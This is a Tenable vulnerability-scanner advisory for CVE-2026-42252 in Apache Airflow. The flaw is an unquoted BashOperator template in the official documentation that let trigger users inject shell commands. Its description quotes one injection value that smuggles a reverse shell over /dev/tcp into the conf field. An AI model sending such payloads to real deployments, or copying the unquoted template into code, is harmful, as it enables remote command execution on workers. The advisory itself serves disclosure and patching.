Echo: apache-airflow: security update to 3.2.2

critical Tenable Cloud Security Plugin ID 462246

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when
triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")`
example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into
deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team
deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection
via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >&
/dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the
documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes
explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-
correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern
fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected
documentation shipped with the release. (CVE-2026-42252)

Solution

Update the apache-airflow library and its related packages to version 3.2.2 or later.

See Also

https://advisory.echohq.com/cve/CVE-2026-42252

Plugin Details

Severity: Critical

ID: 462246

Version: Revision 1.1

Type: Local

Published: 10/2/2026

Updated: 10/3/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Medium

Score: 4.3

Percentile: 53.62

CVSS v2

Risk Factor: High

Base Score: 9.4

Temporal Score: 7

Vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N

CVSS Score Source: CVE-2026-42252

CVSS v3

Risk Factor: Critical

Base Score: 9.1

Temporal Score: 7.9

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 7/11/2026

Vulnerability Publication Date: 6/1/2026

Reference Information

CVE: CVE-2026-42252